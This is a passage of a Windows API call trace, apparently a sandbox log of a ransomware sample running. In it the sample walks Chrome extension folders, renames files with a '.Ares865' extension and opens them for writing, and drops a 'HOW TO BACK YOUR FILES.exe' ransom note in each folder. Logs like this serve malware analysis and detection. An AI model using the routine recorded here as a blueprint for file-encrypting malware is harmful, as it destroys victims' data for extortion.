Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x828e7880, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e41cec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e41cec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.153] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.153] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.154] lstrcpyW (in: lpString1=0x2cce51a, lpString2="verified_contents.json" | out: lpString1="verified_contents.json") returned="verified_contents.json" [0101.154] lstrlenW (lpString="verified_contents.json") returned 22 [0101.154] lstrlenW (lpString="Ares865") returned 7 [0101.154] lstrcmpiW (lpString1="ts.json", lpString2="Ares865") returned 1 [0101.154] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json.Ares865") returned 171 [0101.154] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json.ares865"), dwFlags=0x1) returned 1 [0101.155] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.156] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11770) returned 1 [0101.159] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales" [0101.159] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales" [0101.159] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.159] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.160] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.160] GetLastError () returned 0x0 [0101.160] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.160] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82665710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e443020, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e443020, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.160] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.160] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.160] lstrcpyW (in: lpString1=0x2cce518, lpString2="bg" | out: lpString1="bg") returned="bg" [0101.160] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c08 [0101.160] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x2e0838 [0101.161] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c10 | out: ListHead=0x2e7710, ListEntry=0x2e7c10) returned 0x2e7c50 [0101.161] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82676880, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e5bfde0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e5bfde0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ca", cAlternateFileName="")) returned 1 [0101.161] lstrcmpiW (lpString1="ca", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.161] lstrcmpiW (lpString1="ca", lpString2="aoldtz.exe") returned 1 [0101.161] lstrcpyW (in: lpString1=0x2cce518, lpString2="ca" | out: lpString1="ca") returned="ca" [0101.161] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b28 [0101.161] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x2e0960 [0101.161] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b30 | out: ListHead=0x2e7710, ListEntry=0x2e7b30) returned 0x2e7c10 [0101.161] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x826a0090, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e5bfde0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e5bfde0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs", cAlternateFileName="")) returned 1 [0101.161] lstrcmpiW (lpString1="cs", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.161] lstrcmpiW (lpString1="cs", lpString2="aoldtz.exe") returned 1 [0101.161] lstrcpyW (in: lpString1=0x2cce518, lpString2="cs" | out: lpString1="cs") returned="cs" [0101.161] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7be8 [0101.161] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x2e0a88 [0101.161] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bf0 | out: ListHead=0x2e7710, ListEntry=0x2e7bf0) returned 0x2e7b30 [0101.161] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x826ac3e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e5bfde0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e5bfde0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da", cAlternateFileName="")) returned 1 [0101.161] lstrcmpiW (lpString1="da", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.161] lstrcmpiW (lpString1="da", lpString2="aoldtz.exe") returned 1 [0101.161] lstrcpyW (in: lpString1=0x2cce518, lpString2="da" | out: lpString1="da") returned="da" [0101.161] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2240 [0101.161] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x2e0bb0 [0101.161] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2248 | out: ListHead=0x2e7710, ListEntry=0x2d2248) returned 0x2e7bf0 [0101.161] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x826b8730, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e599c80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e599c80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de", cAlternateFileName="")) returned 1 [0101.161] lstrcmpiW (lpString1="de", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.161] lstrcmpiW (lpString1="de", lpString2="aoldtz.exe") returned 1 [0101.162] lstrcpyW (in: lpString1=0x2cce518, lpString2="de" | out: lpString1="de") returned="de" [0101.162] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2580 [0101.162] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x2e0cd8 [0101.162] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2588 | out: ListHead=0x2e7710, ListEntry=0x2d2588) returned 0x2d2248 [0101.162] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x826c2370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e599c80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e599c80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el", cAlternateFileName="")) returned 1 [0101.162] lstrcmpiW (lpString1="el", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.162] lstrcmpiW (lpString1="el", lpString2="aoldtz.exe") returned 1 [0101.162] lstrcpyW (in: lpString1=0x2cce518, lpString2="el" | out: lpString1="el") returned="el" [0101.162] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2560 [0101.162] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x2e0e00 [0101.162] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2568 | out: ListHead=0x2e7710, ListEntry=0x2d2568) returned 0x2d2588 [0101.162] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x826ce6c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e573b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e573b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0101.162] lstrcmpiW (lpString1="en", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.162] lstrcmpiW (lpString1="en", lpString2="aoldtz.exe") returned 1 [0101.162] lstrcpyW (in: lpString1=0x2cce518, lpString2="en" | out: lpString1="en") returned="en" [0101.162] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d25e0 [0101.162] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x2e0f28 [0101.162] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d25e8 | out: ListHead=0x2e7710, ListEntry=0x2d25e8) returned 0x2d2568 [0101.162] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x826d8300, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e573b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e573b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en_GB", cAlternateFileName="")) returned 1 [0101.162] lstrcmpiW (lpString1="en_GB", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.162] lstrcmpiW (lpString1="en_GB", lpString2="aoldtz.exe") returned 1 [0101.162] lstrcpyW (in: lpString1=0x2cce518, lpString2="en_GB" | out: lpString1="en_GB") returned="en_GB" [0101.162] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2600 [0101.163] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x124) returned 0x336fc8 [0101.163] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2608 | out: ListHead=0x2e7710, ListEntry=0x2d2608) returned 0x2d25e8 [0101.163] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x826e9470, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e573b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e573b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es", cAlternateFileName="")) returned 1 [0101.163] lstrcmpiW (lpString1="es", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.163] lstrcmpiW (lpString1="es", lpString2="aoldtz.exe") returned 1 [0101.163] lstrcpyW (in: lpString1=0x2cce518, lpString2="es" | out: lpString1="es") returned="es" [0101.163] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2360 [0101.163] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x2e1050 [0101.163] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2368 | out: ListHead=0x2e7710, ListEntry=0x2d2368) returned 0x2d2608 [0101.163] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x826f30b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e573b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e573b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es_419", cAlternateFileName="")) returned 1 [0101.163] lstrcmpiW (lpString1="es_419", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.163] lstrcmpiW (lpString1="es_419", lpString2="aoldtz.exe") returned 1 [0101.163] lstrcpyW (in: lpString1=0x2cce518, lpString2="es_419" | out: lpString1="es_419") returned="es_419" [0101.163] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2380 [0101.163] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x126) returned 0x337100 [0101.163] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2388 | out: ListHead=0x2e7710, ListEntry=0x2d2388) returned 0x2d2368 [0101.163] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x826ff400, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e54d9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e54d9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="et", cAlternateFileName="")) returned 1 [0101.163] lstrcmpiW (lpString1="et", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.163] lstrcmpiW (lpString1="et", lpString2="aoldtz.exe") returned 1 [0101.163] lstrcpyW (in: lpString1=0x2cce518, lpString2="et" | out: lpString1="et") returned="et" [0101.163] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23c0 [0101.163] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x2e1178 [0101.163] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d23c8 | out: ListHead=0x2e7710, ListEntry=0x2d23c8) returned 0x2d2388 [0101.163] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82709040, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e54d9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e54d9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi", cAlternateFileName="")) returned 1 [0101.163] lstrcmpiW (lpString1="fi", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.163] lstrcmpiW (lpString1="fi", lpString2="aoldtz.exe") returned 1 [0101.164] lstrcpyW (in: lpString1=0x2cce518, lpString2="fi" | out: lpString1="fi") returned="fi" [0101.164] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d25a0 [0101.164] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x2e12a0 [0101.164] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d25a8 | out: ListHead=0x2e7710, ListEntry=0x2d25a8) returned 0x2d23c8 [0101.164] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82715390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e54d9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e54d9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fil", cAlternateFileName="")) returned 1 [0101.164] lstrcmpiW (lpString1="fil", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.164] lstrcmpiW (lpString1="fil", lpString2="aoldtz.exe") returned 1 [0101.164] lstrcpyW (in: lpString1=0x2cce518, lpString2="fil" | out: lpString1="fil") returned="fil" [0101.164] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2280 [0101.164] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x120) returned 0x2e13c8 [0101.164] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2288 | out: ListHead=0x2e7710, ListEntry=0x2d2288) returned 0x2d25a8 [0101.164] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8271efd0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e54d9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e54d9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr", cAlternateFileName="")) returned 1 [0101.164] lstrcmpiW (lpString1="fr", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.164] lstrcmpiW (lpString1="fr", lpString2="aoldtz.exe") returned 1 [0101.164] lstrcpyW (in: lpString1=0x2cce518, lpString2="fr" | out: lpString1="fr") returned="fr" [0101.164] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2620 [0101.164] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x2e14f0 [0101.164] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2628 | out: ListHead=0x2e7710, ListEntry=0x2d2628) returned 0x2d2288 [0101.164] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82728c10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e54d9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e54d9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hi", cAlternateFileName="")) returned 1 [0101.164] lstrcmpiW (lpString1="hi", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.164] lstrcmpiW (lpString1="hi", lpString2="aoldtz.exe") returned 1 [0101.164] lstrcpyW (in: lpString1=0x2cce518, lpString2="hi" | out: lpString1="hi") returned="hi" [0101.164] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23a0 [0101.164] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x2e1618 [0101.164] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d23a8 | out: ListHead=0x2e7710, ListEntry=0x2d23a8) returned 0x2d2628 [0101.165] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e443020, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4e443020, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0101.165] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0101.165] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x827412b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e527860, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e527860, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hr", cAlternateFileName="")) returned 1 [0101.165] lstrcmpiW (lpString1="hr", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.165] lstrcmpiW (lpString1="hr", lpString2="aoldtz.exe") returned 1 [0101.165] lstrcpyW (in: lpString1=0x2cce518, lpString2="hr" | out: lpString1="hr") returned="hr" [0101.165] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2260 [0101.165] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x2e1740 [0101.165] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2268 | out: ListHead=0x2e7710, ListEntry=0x2d2268) returned 0x2d23a8 [0101.165] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8274aef0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e527860, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e527860, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu", cAlternateFileName="")) returned 1 [0101.165] lstrcmpiW (lpString1="hu", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.165] lstrcmpiW (lpString1="hu", lpString2="aoldtz.exe") returned 1 [0101.165] lstrcpyW (in: lpString1=0x2cce518, lpString2="hu" | out: lpString1="hu") returned="hu" [0101.165] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23e0 [0101.165] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x2e1868 [0101.165] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d23e8 | out: ListHead=0x2e7710, ListEntry=0x2d23e8) returned 0x2d2268 [0101.165] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, 